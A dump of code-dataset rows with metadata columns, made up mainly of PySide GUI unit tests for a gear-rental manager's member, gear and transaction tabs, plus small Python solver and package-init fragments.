Q[:, 0:m] = op.Q.real
Q[:, m:2*m] = op.Q.imag
Z = EpetraInterface.Vector(rhs.real.Map(), m * 2)
Z[:, 0:m] = op.Z.real
Z[:, m:2*m] = op.Z.imag
epetra_op = ComplexEpetraInterface.Operator(ShiftedOperator(op))
if self.preconditioned_solve:
solver = HYMLS.Solver(epetra_op, self.interface.preconditioner, self.parameters)
solver.SetBorder(Z, Q)
self.interface.preconditioner.Compute()
solver.ApplyInverse(x, y)
solver.UnsetBorder()
else:
raise Exception('Not implemented')
out = ComplexEpetraInterface.ComplexVector(y[:, 0], y[:, 1])
return out
def prec(self, x, *args):
y = EpetraInterface.Vector(x.real.Map(), 2)
z = EpetraInterface.Vector(x.real.Map(), 2)
y[:, 0] = x.real
y[:, 1] = x.imag
self.interface.preconditioner.ApplyInverse(y, z)
out = ComplexEpetraInterface.ComplexVector(z[:, 0], z[:, 1])
return out
| 34.4375
| 92
| 0.638355
| 947
| 8,265
| 5.444562
| 0.102429
| 0.086889
| 0.05896
| 0.048099
| 0.867145
| 0.854732
| 0.834368
| 0.782002
| 0.727308
| 0.727308
| 0
| 0.009305
| 0.245856
| 8,265
| 239
| 93
| 34.58159
| 0.817905
| 0.043436
| 0
| 0.705202
| 0
| 0
| 0.044309
| 0
| 0
| 0
| 0
| 0
| 0.00578
| 1
| 0.104046
| false
| 0
| 0.028902
| 0.00578
| 0.236994
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
bd7e937b4ff137bcde0aff448164da8005218fdb
| 139
|
py
|
Python
|
dlf/preprocessing/__init__.py
|
scheckmedia/dl-framework
|
8fea39e166fda0ff8fa51696831bf5cb42f3ed10
|
[
"Apache-2.0"
] | null | null | null |
dlf/preprocessing/__init__.py
|
scheckmedia/dl-framework
|
8fea39e166fda0ff8fa51696831bf5cb42f3ed10
|
[
"Apache-2.0"
] | null | null | null |
dlf/preprocessing/__init__.py
|
scheckmedia/dl-framework
|
8fea39e166fda0ff8fa51696831bf5cb42f3ed10
|
[
"Apache-2.0"
] | null | null | null |
from dlf.core.registry import import_framework_modules
from pathlib import Path
import_framework_modules(Path(__file__).parent, __name__)
| 27.8
| 57
| 0.863309
| 19
| 139
| 5.684211
| 0.631579
| 0.277778
| 0.407407
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.079137
| 139
| 4
| 58
| 34.75
| 0.84375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
bda8aef1f8ac24910dc0f79ac38c1e754812694d
| 27,068
|
py
|
Python
|
Tests/tests_gui.py
|
galbrads/Gear_Manager
|
3b8ba0f455130556be21a9dbd43f4e9ae6243be9
|
[
"MIT"
] | null | null | null |
Tests/tests_gui.py
|
galbrads/Gear_Manager
|
3b8ba0f455130556be21a9dbd43f4e9ae6243be9
|
[
"MIT"
] | null | null | null |
Tests/tests_gui.py
|
galbrads/Gear_Manager
|
3b8ba0f455130556be21a9dbd43f4e9ae6243be9
|
[
"MIT"
] | null | null | null |
from __future__ import division
from PySide import QtGui, QtCore
from PySide.QtTest import QTest
import unittest
import tests
import GearManager
import Util
import sys
import os
#
# --- Member Tab tests -------------------------------------------------------------------------------------------------
#
class MemberValueTests(unittest.TestCase):
def setUp(self):
self.app = QtGui.QApplication.instance()
if self.app is None:
self.app = QtGui.QApplication(sys.argv)
self.app.setQuitOnLastWindowClosed(True)
if os.path.isfile(tests.dBName):
os.remove(tests.dBName)
self.ui = GearManager.MainUI(tests.dBName)
self.ui.defDueDateWin.okBut.click()
self.ui.tabWid.setCurrentIndex(1)
self.tMemb = self.ui.tabWid.widget(1)
self.membA1 = tests.mkMember('A', 1)
# Clear the current member and member fields
self.tMemb.nameSearch.clear()
self.tMemb.clear_fields()
def test_AddUpdMember(self):
tests.enterMemberInfo(self, self.membA1)
self.assertTrue(self.tMemb.Button_addUpdButClick())
# AddUpd the same member but with a bad local zip code, should fail
def test_AddUpdMember_shortZip(self):
self.membA1['zip'] = '1' * 4
tests.enterMemberInfo(self, self.membA1)
self.assertFalse(self.tMemb.Button_addUpdButClick())
# Zip field is limited to 5 numbers. Trying to enter 6 will strip it to 5
def test_AddUpdMember_longZip(self):
zip_code = '1' * 6
self.membA1['PermZip'] = zip_code
tests.enterMemberInfo(self, self.membA1)
self.assertTrue(self.tMemb.Button_addUpdButClick())
self.assertEqual(self.tMemb.zipEdit.text(), zip_code[:5])
def test_AddUpdMember_badZipA(self):
self.membA1['zip'] = 'a' * 5
tests.enterMemberInfo(self, self.membA1)
self.assertFalse(self.tMemb.Button_addUpdButClick())
def test_AddUpdMember_bDayToday(self):
self.membA1['Birthday'] = Util.convert_date('Qt2DB', QtCore.QDate.currentDate())
tests.enterMemberInfo(self, self.membA1)
self.assertFalse(self.tMemb.Button_addUpdButClick())
def test_AddUpdMember_bDayInFuture(self):
self.membA1['Birthday'] = Util.convert_date('Qt2DB', QtCore.QDate.currentDate().addDays(1))
tests.enterMemberInfo(self, self.membA1)
self.assertFalse(self.tMemb.Button_addUpdButClick())
def test_AddUpdMember_no_AT_inEmal(self):
self.membA1['Email'] = 'AAA.AAA.com'
tests.enterMemberInfo(self, self.membA1)
self.assertFalse(self.tMemb.Button_addUpdButClick())
def test_AddUpdMember_shortPhone(self):
self.membA1['Phone'] = '1' * 9
tests.enterMemberInfo(self, self.membA1)
self.assertFalse(self.tMemb.Button_addUpdButClick())
def test_AddUpdMember_longPhone(self):
self.membA1['Phone'] = '1' * 11
tests.enterMemberInfo(self, self.membA1)
self.assertFalse(self.tMemb.Button_addUpdButClick())
def test_AddUpdMember_lettersInPhone(self):
self.membA1['Phone'] = '11111A1111'
tests.enterMemberInfo(self, self.membA1)
self.assertFalse(self.tMemb.Button_addUpdButClick())
def test_AddUpdMember_quotesInName1(self):
self.membA1['FirstName'] = "AA'A"
tests.enterMemberInfo(self, self.membA1)
self.assertTrue(self.tMemb.Button_addUpdButClick())
def test_AddUpdMember_quotesInName2(self):
self.membA1['FirstName'] = 'AA"A'
tests.enterMemberInfo(self, self.membA1)
self.assertTrue(self.tMemb.Button_addUpdButClick())
def tearDown(self):
self.ui.tabWid.setCurrentIndex(1)
self.tMemb.nameSearch.clear()
self.tMemb.clear_fields()
for table in self.ui.db.tableDefs.keys():
self.ui.db.execQuery('DROP TABLE ' + table, 'tests_trans -> tearDown')
self.ui.db.close()
self.app.quit()
del self.app
class MemberAddUpdateTests(unittest.TestCase):
def setUp(self):
self.app = QtGui.QApplication.instance()
if self.app is None:
self.app = QtGui.QApplication(sys.argv)
self.app.setQuitOnLastWindowClosed(True)
if os.path.isfile(tests.dBName):
os.remove(tests.dBName)
self.ui = GearManager.MainUI(tests.dBName)
self.ui.defDueDateWin.okBut.click()
self.ui.tabWid.setCurrentIndex(1)
self.tMemb = self.ui.tabWid.widget(1)
self.membA1 = tests.mkMember('A', 1)
self.membB2 = tests.mkMember('B', 2)
# Check that the database is open
def test_databaseConnection(self):
self.assertTrue(self.ui.db.SQLDB.isOpen(), 'Database is not open')
# Add a member, should work
# def test_AddMember_addNewMember(self):
self.tMemb.nameSearch.clear()
self.tMemb.clear_fields()
tests.enterMemberInfo(self, self.membA1)
self.assertTrue(self.tMemb.areMemberFieldsValid())
self.assertTrue(self.tMemb.Button_addUpdButClick())
# Add the same member, should fail
# def test_AddMember_addIdenticalMember(self):
self.tMemb.nameSearch.clear()
self.tMemb.clear_fields()
tests.enterMemberInfo(self, self.membA1)
self.assertTrue(self.tMemb.areMemberFieldsValid())
self.assertFalse(self.tMemb.Button_addUpdButClick())
# Update existing member, but no valid member in the search field, should fail
# def test_AddMember_updateMember_noCurrentMember(self):
self.tMemb.nameSearch.clear()
self.tMemb.clear_fields()
tests.enterMemberInfo(self, self.membA1)
self.assertTrue(self.tMemb.areMemberFieldsValid())
self.assertFalse(self.tMemb.Button_addUpdButClick())
# Update existing member, should work
# def test_AddMember_updateMember_currentMember(self):
self.tMemb.nameSearch.clear()
self.tMemb.clear_fields()
self.tMemb.nameSearch.setText('{} {}'.format(self.membA1['FirstName'], self.membA1['LastName']))
self.assertTrue(self.tMemb.Button_addUpdButClick())
# Add non-existing member, should work
# def test_AddMember_addNonMember(self):
self.tMemb.nameSearch.clear()
self.tMemb.clear_fields()
tests.enterMemberInfo(self, self.membB2)
self.assertTrue(self.tMemb.areMemberFieldsValid())
self.assertTrue(self.tMemb.Button_addUpdButClick())
# AddUpd the same member, should work
# def test_AddMember_updateMember(self):
self.tMemb.nameSearch.clear()
self.tMemb.clear_fields()
tests.enterMemberInfo(self, self.membA1)
self.assertFalse(self.tMemb.Button_addUpdButClick())
# AddUpd the same member but with a new first name, should work
# def test_AddMember_newFName(self):
self.tMemb.nameSearch.clear()
self.tMemb.clear_fields()
self.membA1['FirstName'] = 'AAAA'
tests.enterMemberInfo(self, self.membA1)
self.assertTrue(self.tMemb.Button_addUpdButClick())
# AddUpd the same member but with a new last name, should work
# def test_AddMember_newLName(self):
self.tMemb.nameSearch.clear()
self.tMemb.clear_fields()
self.membA1['LastName'] = 'AAAA'
tests.enterMemberInfo(self, self.membA1)
self.assertTrue(self.tMemb.Button_addUpdButClick())
# AddUpd the same member but with a new birthday, should work
# def test_AddMember_newBDay(self):
self.tMemb.nameSearch.clear()
self.tMemb.clear_fields()
self.membA1['Birthday'] = '1800-01-01'
tests.enterMemberInfo(self, self.membA1)
self.assertTrue(self.tMemb.Button_addUpdButClick())
# AddUpd the current member with a new birthday, should work
# def test_AddMember_newBDay(self):
self.tMemb.nameSearch.clear()
self.tMemb.clear_fields()
self.membA1['Birthday'] = '1800-01-02'
tests.enterMemberInfo(self, self.membA1)
self.assertTrue(self.tMemb.Button_addUpdButClick())
# AddUpd the current member with a new birthday
# Two members with the same name, but different birthdays now exist,
# should fail without selecting the correct birthday
# def test_AddMember_newBDay(self):
self.tMemb.nameSearch.clear()
self.tMemb.clear_fields()
self.tMemb.nameSearch.setText('{} {}'.format(self.membA1['FirstName'], self.membA1['LastName']))
tests.enterMemberInfo(self, self.membA1)
self.assertFalse(self.tMemb.Button_addUpdButClick())
# AddUpd the current member with a new birthday
# Two members with the same name, but different birthdays now exist,
# should work if selecting the first birthday
# def test_AddMember_newBDay(self):
self.tMemb.nameSearch.clear()
self.tMemb.clear_fields()
self.tMemb.nameSearch.setText('{} {}'.format(self.membA1['FirstName'], self.membA1['LastName']))
self.tMemb.bDayBox.setCurrentIndex(self.tMemb.bDayBox.findText(Util.convert_date('DB2Disp', '1800-01-01')))
self.assertTrue(self.tMemb.Button_addUpdButClick())
# AddUpd the current member with a new birthday
# Two members with the same name, but different birthdays now exist,
# should work if selecting the second birthday
# def test_AddMember_newBDay(self):
self.tMemb.nameSearch.clear()
self.tMemb.clear_fields()
self.tMemb.nameSearch.setText('{} {}'.format(self.membA1['FirstName'], self.membA1['LastName']))
self.tMemb.bDayBox.setCurrentIndex(self.tMemb.bDayBox.findText(Util.convert_date('DB2Disp', '1800-01-02')))
self.assertTrue(self.tMemb.Button_addUpdButClick())
# AddUpd the current member with a new birthday that matches an existing members name/birthday, should not work
# def test_AddMember_newBDay(self):
self.tMemb.nameSearch.clear()
self.tMemb.clear_fields()
self.tMemb.nameSearch.setText('{} {}'.format(self.membA1['FirstName'], self.membA1['LastName']))
self.tMemb.bDayBox.setCurrentIndex(self.tMemb.bDayBox.findText(Util.convert_date('DB2Disp', '1900-01-01')))
self.membA1['Birthday'] = '1800-01-02'
tests.enterMemberInfo(self, self.membA1)
self.assertFalse(self.tMemb.Button_addUpdButClick())
def tearDown(self):
self.ui.tabWid.setCurrentIndex(1)
self.tMemb.nameSearch.clear()
self.tMemb.clear_fields()
for table in self.ui.db.tableDefs.keys():
self.ui.db.execQuery('DROP TABLE ' + table, 'tests_memb -> tearDown')
self.ui.db.close()
self.app.quit()
del self.app
#
# --- Gear Tab tests ---------------------------------------------------------------------------------------------------
#
class GearValueTests(unittest.TestCase):
def setUp(self):
self.app = QtGui.QApplication.instance()
if self.app is None:
self.app = QtGui.QApplication(sys.argv)
self.app.setQuitOnLastWindowClosed(True)
if os.path.isfile(tests.dBName):
os.remove(tests.dBName)
self.ui = GearManager.MainUI(tests.dBName)
self.ui.defDueDateWin.okBut.click()
self.ui.tabWid.setCurrentIndex(2)
self.tGear = self.ui.tabWid.widget(2)
self.gearA1 = tests.mkGear('A', 1)
# Clear the current member and member fields
self.tGear.gNameIDSearch.clear()
self.tGear.clear_fields()
def test_addGear(self):
tests.enterGearInfo(self, self.gearA1)
self.assertTrue(self.tGear.button_save_gear())
# The quantity window has limits on the inouts that cover this case
def test_negativeQuant(self):
self.gearA1['Quantity'] = -self.gearA1['Quantity']
tests.enterGearInfo(self, self.gearA1)
self.assertTrue(self.tGear.button_save_gear())
def test_iD(self):
self.gearA1['ID'] = 'ID1'
tests.enterGearInfo(self, self.gearA1)
self.assertTrue(self.tGear.button_save_gear())
def test_iDWithStar1(self):
for n in [1, 2, 5, 22, 10, 3, 42]:
self.gearA1['ID'] = 'ID{:02}'.format(n)
tests.enterGearInfo(self, self.gearA1)
self.assertTrue(self.tGear.button_save_gear())
self.gearA1['ID'] = 'ID*'
tests.enterGearInfo(self, self.gearA1)
self.assertTrue(self.tGear.button_save_gear())
self.assertEqual(self.tGear.GIDEdit.text(), 'ID04')
def test_iDWithStar2(self):
end = 23
for n in xrange(1, end):
self.gearA1['ID'] = 'ID{:02}'.format(n)
tests.enterGearInfo(self, self.gearA1)
self.assertTrue(self.tGear.button_save_gear())
self.gearA1['ID'] = 'ID{:02}'.format(end + 1)
tests.enterGearInfo(self, self.gearA1)
self.assertTrue(self.tGear.button_save_gear())
self.gearA1['ID'] = 'ID*'
tests.enterGearInfo(self, self.gearA1)
self.assertTrue(self.tGear.button_save_gear())
self.assertEqual(self.tGear.GIDEdit.text(), 'ID{}'.format(end))
def test_iDWithStarX2(self):
self.gearA1['ID'] = 'ID**'
tests.enterGearInfo(self, self.gearA1)
self.assertFalse(self.tGear.button_save_gear())
def test_negativeWeight(self):
self.gearA1['Weight'] = -self.gearA1['Weight']
tests.enterGearInfo(self, self.gearA1)
self.assertFalse(self.tGear.button_save_gear())
def test_characterInWeight(self):
self.gearA1['Weight'] = 'AAA'
tests.enterGearInfo(self, self.gearA1)
self.assertFalse(self.tGear.button_save_gear())
def test_negativePrice(self):
self.gearA1['Price'] = -self.gearA1['Price']
tests.enterGearInfo(self, self.gearA1)
self.assertFalse(self.tGear.button_save_gear())
def tearDown(self):
self.ui.tabWid.setCurrentIndex(2)
self.tGear.gNameIDSearch.clear()
self.tGear.clear_fields()
for table in self.ui.db.tableDefs.keys():
self.ui.db.execQuery('DROP TABLE ' + table, 'tests_trans -> tearDown')
self.ui.db.close()
self.app.quit()
del self.app
#
# --- Transaction Tab tests --------------------------------------------------------------------------------------------
#
membList = [tests.mkMember('A', 1), tests.mkMember('B', 2)]
gearList = [tests.mkGear('A', 1), tests.mkGear('B', 2)]
class TransactionTests(unittest.TestCase):
def setUp(self):
self.app = QtGui.QApplication.instance()
if self.app is None:
self.app = QtGui.QApplication(sys.argv)
self.app.setQuitOnLastWindowClosed(True)
if os.path.isfile(tests.dBName):
os.remove(tests.dBName)
self.ui = GearManager.MainUI(tests.dBName)
self.ui.defDueDateWin.okBut.click()
self.tTran = self.ui.tabWid.widget(0)
self.tMemb = self.ui.tabWid.widget(1)
self.tGear = self.ui.tabWid.widget(2)
self.tAdmn = self.ui.tabWid.widget(3)
self.ui.tabWid.setCurrentIndex(3)
self.tAdmn.semFalStr.setDate(QtCore.QDate.currentDate().addDays(1))
self.tAdmn.semFalStr.setDate(QtCore.QDate.currentDate().addDays(-1))
self.tAdmn.semSprStr.setDate(QtCore.QDate.currentDate().addDays(7))
self.tAdmn.amountBox.setValue(20)
self.ui.tabWid.setCurrentIndex(1)
for memb in membList:
self.tMemb.nameSearch.clear()
tests.enterMemberInfo(self, memb)
self.tMemb.Button_addUpdButClick()
self.ui.tabWid.setCurrentIndex(0)
for memb in membList:
setTransMemb(self, memb)
QTest.mouseClick(self.tTran.payBut, QtCore.Qt.LeftButton)
QTest.mouseClick(self.tTran.payWind.payBut, QtCore.Qt.LeftButton)
self.tTran.payWind.close()
for gear in gearList:
self.tGear.gNameIDSearch.clear()
tests.enterGearInfo(self, gear)
QTest.mouseClick(self.tGear.updtBut, QtCore.Qt.LeftButton)
self.ui.tabWid.setCurrentIndex(1)
self.tMemb.nameSearch.clear()
self.tMemb.clear_fields()
self.ui.tabWid.setCurrentIndex(2)
self.tGear.gNameIDSearch.clear()
self.tGear.clear_fields()
self.ui.tabWid.setCurrentIndex(0)
self.tTran.nameSearch.clear()
self.tTran.gNameIDSearch.clear()
setTransMemb(self, membList[0])
setTransGear(self, gearList[0], 'Name')
def test_trans(self):
self.tTran.radioIn.click()
self.assertFalse(self.tTran.trans())
self.tTran.radioOut.click()
self.assertTrue(self.tTran.trans())
self.tTran.radioOut.click()
self.assertFalse(self.tTran.trans())
self.tTran.radioIn.click()
self.assertTrue(self.tTran.trans())
def test_returnForSomeoneElse(self):
self.assertFalse(self.tTran.nameRetSearch.isEnabled())
self.tTran.radioOut.click()
self.assertTrue(self.tTran.trans())
self.assertFalse(self.tTran.nameRetSearch.isEnabled())
setTransMemb(self, membList[1])
self.assertFalse(self.tTran.nameRetSearch.isEnabled())
self.tTran.radioIn.click()
self.assertTrue(self.tTran.nameRetSearch.isEnabled())
self.assertTrue(self.tTran.nameRetSearch.count(), 2)
self.tTran.nameRetSearch.setCurrentIndex(self.tTran.nameRetSearch.findText(
membList[0]['FirstName'] + ' ' + membList[0]['LastName']))
self.assertTrue(self.tTran.trans())
def test_returnForSomeoneElseFields(self):
self.assertFalse(self.tTran.nameRetSearch.isEnabled())
self.tTran.radioOut.click()
self.assertTrue(self.tTran.trans())
self.assertFalse(self.tTran.nameRetSearch.isEnabled())
setTransMemb(self, membList[1])
self.assertFalse(self.tTran.nameRetSearch.isEnabled())
self.tTran.radioIn.click()
self.assertTrue(self.tTran.nameRetSearch.isEnabled())
setTransMemb(self, membList[0])
self.assertFalse(self.tTran.nameRetSearch.isEnabled())
def test_notPaid(self):
self.ui.tabWid.setCurrentIndex(2)
gear = tests.mkGear('E', 5)
tests.enterGearInfo(self, gear)
QTest.mouseClick(self.tGear.updtBut, QtCore.Qt.LeftButton)
self.ui.tabWid.setCurrentIndex(1)
self.tMemb.nameSearch.clear()
memb = tests.mkMember('V', 6, forms=True, campusLink=True,
formsDate=Util.convert_date('Qt2DB', QtCore.QDate.currentDate().addDays(1)),
campusDate=Util.convert_date('Qt2DB', QtCore.QDate.currentDate().addDays(-2)))
QTest.keyClicks(self.tMemb.nameSearch, memb['FirstName'] + ' ' + memb['LastName'])
tests.enterMemberInfo(self, memb)
self.assertTrue(self.tMemb.Button_addUpdButClick())
self.ui.tabWid.setCurrentIndex(0)
setTransGear(self, gear, 'Name')
setTransMemb(self, memb)
self.tTran.radioOut.click()
self.assertFalse(self.tTran.trans())
def test_noForm(self):
self.ui.tabWid.setCurrentIndex(2)
gear = tests.mkGear('F', 6)
tests.enterGearInfo(self, gear)
QTest.mouseClick(self.tGear.updtBut, QtCore.Qt.LeftButton)
self.ui.tabWid.setCurrentIndex(1)
self.tMemb.nameSearch.clear()
memb = tests.mkMember('A', 1, forms=False, campusLink=True,
formsDate=Util.convert_date('Qt2DB', QtCore.QDate.currentDate()),
campusDate=Util.convert_date('Qt2DB', QtCore.QDate.currentDate().addDays(-2)))
QTest.keyClicks(self.tMemb.nameSearch, memb['FirstName'] + ' ' + memb['LastName'])
tests.enterMemberInfo(self, memb)
self.assertTrue(self.tMemb.Button_addUpdButClick())
self.ui.tabWid.setCurrentIndex(0)
setTransGear(self, gear, 'Name')
setTransMemb(self, memb)
QTest.mouseClick(self.tTran.payBut, QtCore.Qt.LeftButton)
QTest.mouseClick(self.tTran.payWind.payBut, QtCore.Qt.LeftButton)
self.tTran.payWind.close()
self.tTran.radioOut.click()
self.assertFalse(self.tTran.trans())
def test_oldForm(self):
self.ui.tabWid.setCurrentIndex(2)
gear = tests.mkGear('G', 7)
tests.enterGearInfo(self, gear)
QTest.mouseClick(self.tGear.updtBut, QtCore.Qt.LeftButton)
self.ui.tabWid.setCurrentIndex(1)
self.tMemb.nameSearch.clear()
memb = tests.mkMember('A', 1, forms=True, campusLink=True,
formsDate=Util.convert_date('Qt2DB', QtCore.QDate.currentDate().addDays(-10)),
campusDate=Util.convert_date('Qt2DB', QtCore.QDate.currentDate().addDays(2)))
QTest.keyClicks(self.tMemb.nameSearch, memb['FirstName'] + ' ' + memb['LastName'])
tests.enterMemberInfo(self, memb)
self.assertTrue(self.tMemb.Button_addUpdButClick())
self.ui.tabWid.setCurrentIndex(0)
setTransGear(self, gear, 'Name')
setTransMemb(self, memb)
QTest.mouseClick(self.tTran.payBut, QtCore.Qt.LeftButton)
QTest.mouseClick(self.tTran.payWind.payBut, QtCore.Qt.LeftButton)
self.tTran.payWind.close()
self.tTran.radioOut.click()
self.assertFalse(self.tTran.trans())
def test_paid_currentForm_currentCampus(self):
self.ui.tabWid.setCurrentIndex(2)
gear = tests.mkGear('H', 8)
tests.enterGearInfo(self, gear)
QTest.mouseClick(self.tGear.updtBut, QtCore.Qt.LeftButton)
self.ui.tabWid.setCurrentIndex(1)
self.tMemb.nameSearch.clear()
memb = tests.mkMember('A', 1, forms=True, campusLink=True,
formsDate=Util.convert_date('Qt2DB', QtCore.QDate.currentDate().addDays(1)),
campusDate=Util.convert_date('Qt2DB', QtCore.QDate.currentDate().addDays(-1)))
QTest.keyClicks(self.tMemb.nameSearch, memb['FirstName'] + ' ' + memb['LastName'])
tests.enterMemberInfo(self, memb)
self.assertTrue(self.tMemb.Button_addUpdButClick())
self.ui.tabWid.setCurrentIndex(0)
setTransGear(self, gear, 'Name')
setTransMemb(self, memb)
QTest.mouseClick(self.tTran.payBut, QtCore.Qt.LeftButton)
QTest.mouseClick(self.tTran.payWind.payBut, QtCore.Qt.LeftButton)
self.tTran.payWind.close()
self.tTran.radioOut.click()
self.assertTrue(self.tTran.trans())
def test_noCampusLink(self):
self.ui.tabWid.setCurrentIndex(2)
gear = tests.mkGear('I', 9)
tests.enterGearInfo(self, gear)
QTest.mouseClick(self.tGear.updtBut, QtCore.Qt.LeftButton)
self.ui.tabWid.setCurrentIndex(1)
self.tMemb.nameSearch.clear()
memb = tests.mkMember('A', 1, forms=True, campusLink=False,
formsDate=Util.convert_date('Qt2DB', QtCore.QDate.currentDate().addDays(-2)),
campusDate=Util.convert_date('Qt2DB', QtCore.QDate.currentDate()))
QTest.keyClicks(self.tMemb.nameSearch, memb['FirstName'] + ' ' + memb['LastName'])
tests.enterMemberInfo(self, memb)
self.assertTrue(self.tMemb.Button_addUpdButClick())
self.ui.tabWid.setCurrentIndex(0)
setTransGear(self, gear, 'Name')
setTransMemb(self, memb)
QTest.mouseClick(self.tTran.payBut, QtCore.Qt.LeftButton)
QTest.mouseClick(self.tTran.payWind.payBut, QtCore.Qt.LeftButton)
self.tTran.payWind.close()
self.tTran.radioOut.click()
self.assertFalse(self.tTran.trans())
def test_campusLinkLastYears(self):
self.ui.tabWid.setCurrentIndex(2)
gear = tests.mkGear('J', 10)
tests.enterGearInfo(self, gear)
QTest.mouseClick(self.tGear.updtBut, QtCore.Qt.LeftButton)
self.ui.tabWid.setCurrentIndex(1)
self.tMemb.nameSearch.clear()
memb = tests.mkMember('A', 1, forms=True, campusLink=True,
formsDate=Util.convert_date('Qt2DB', QtCore.QDate.currentDate().addDays(1)),
campusDate=Util.convert_date('Qt2DB', QtCore.QDate.currentDate().addDays(-10)))
QTest.keyClicks(self.tMemb.nameSearch, memb['FirstName'] + ' ' + memb['LastName'])
tests.enterMemberInfo(self, memb)
self.assertTrue(self.tMemb.Button_addUpdButClick())
self.ui.tabWid.setCurrentIndex(0)
setTransGear(self, gear, 'Name')
setTransMemb(self, memb)
QTest.mouseClick(self.tTran.payBut, QtCore.Qt.LeftButton)
QTest.mouseClick(self.tTran.payWind.payBut, QtCore.Qt.LeftButton)
self.tTran.payWind.close()
self.tTran.radioOut.click()
self.assertTrue(self.tTran.trans())
def test_defaultDueDateWhenMemberChanges(self):
nDays = 50
self.tTran.dueDateCal.setSelectedDate(self.ui.db.getDefaultDueDate())
self.ui.tabWid.setCurrentIndex(0)
setTransMemb(self, membList[0])
self.tTran.dueDateCal.setSelectedDate(QtCore.QDate.currentDate().addDays(nDays))
self.assertEquals(self.tTran.dueDateCal.selectedDate(), QtCore.QDate.currentDate().addDays(nDays))
setTransMemb(self, membList[1])
self.assertEquals(self.tTran.dueDateCal.selectedDate(), self.ui.db.getDefaultDueDate())
def tearDown(self):
self.ui.tabWid.setCurrentIndex(1)
self.tMemb.nameSearch.clear()
self.tMemb.clear_fields()
self.ui.tabWid.setCurrentIndex(2)
self.tGear.gNameIDSearch.clear()
self.tGear.clear_fields()
self.ui.tabWid.setCurrentIndex(0)
self.tTran.nameSearch.clear()
self.tTran.gNameIDSearch.clear()
for table in self.ui.db.tableDefs.keys():
self.ui.db.execQuery('DROP TABLE ' + table, 'tests_trans -> tearDown')
self.ui.db.close()
self.app.quit()
del self.app
def setTransMemb(this, membAttr):
this.tTran.nameSearch.clear()
QTest.keyClicks(this.tTran.nameSearch, membAttr['FirstName'] + ' ' + membAttr['LastName'])
if this.tTran.bDayBox.count() > 1:
this.tTran.bDayBox.setCurrentIndex(this.tTran.bDayBox.findText(membAttr['Birthday']))
def setTransGear(this, gearAttr, nameID):
if nameID == 'Name':
IDName = 'ID'
else:
IDName = 'Name'
this.tTran.gNameIDSearch.clear()
QTest.keyClicks(this.tTran.gNameIDSearch, gearAttr[nameID])
if this.tTran.gDissAmbSearch.count() > 1:
this.tTran.gDissAmbSearch.setCurrentIndex(this.tTran.gDissAmbSearch.findText(gearAttr[IDName]))
def setReturnMemb(this, membAttr):
if this.tTran.nameRetSearch.isEnabled():
this.tTran.nameRetSearch.setCurrentIndex(this.tTran.nameRetSearch.findText(membAttr['FirstName'] + ' ' + membAttr['LastName']))
if this.tTran.bDayRetBox.isEnabled() and this.tTran.bDayRetBox.count() > 1:
this.tTran.bDayRetBox.setCurrentIndex(this.tTran.bDayRetBox.findText(membAttr['Birthday']))
| 38.613409
| 135
| 0.651914
| 3,049
| 27,068
| 5.726796
| 0.096425
| 0.05309
| 0.043296
| 0.052574
| 0.830021
| 0.80465
| 0.790905
| 0.771376
| 0.753221
| 0.726992
| 0
| 0.013595
| 0.211948
| 27,068
| 700
| 136
| 38.668571
| 0.804979
| 0.084897
| 0
| 0.725806
| 0
| 0
| 0.03661
| 0
| 0
| 0
| 0
| 0
| 0.155242
| 1
| 0.086694
| false
| 0
| 0.018145
| 0
| 0.112903
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
da3284c6b749a0f044382110d08615aadba15bdf
| 106
|
py
|
Python
|
observing_suite/__init__.py
|
prappleizer/observing-suite
|
b8d342a6515da7357e34c51c7fdef9cff6eee125
|
[
"MIT"
] | 3
|
2022-02-26T20:01:09.000Z
|
2022-03-15T22:34:50.000Z
|
observing_suite/__init__.py
|
prappleizer/observing-suite
|
b8d342a6515da7357e34c51c7fdef9cff6eee125
|
[
"MIT"
] | null | null | null |
observing_suite/__init__.py
|
prappleizer/observing-suite
|
b8d342a6515da7357e34c51c7fdef9cff6eee125
|
[
"MIT"
] | null | null | null |
from .target import *
from .imaging import *
from .observing_plan import *
from .observing_log import *
| 26.5
| 30
| 0.754717
| 14
| 106
| 5.571429
| 0.5
| 0.384615
| 0.487179
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.169811
| 106
| 4
| 31
| 26.5
| 0.886364
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
da5e0d47aee2c534b2ce24dca1534f07435557b7
| 59
|
py
|
Python
|
l10n_br_automated_payment/wizard/__init__.py
|
kaoecoito/odoo-brasil
|
6e019efc4e03b2e7be6ca51d08ace095240e0f07
|
[
"MIT"
] | 181
|
2016-11-11T04:39:43.000Z
|
2022-03-14T21:17:19.000Z
|
l10n_br_automated_payment/wizard/__init__.py
|
kaoecoito/odoo-brasil
|
6e019efc4e03b2e7be6ca51d08ace095240e0f07
|
[
"MIT"
] | 899
|
2016-11-14T02:42:56.000Z
|
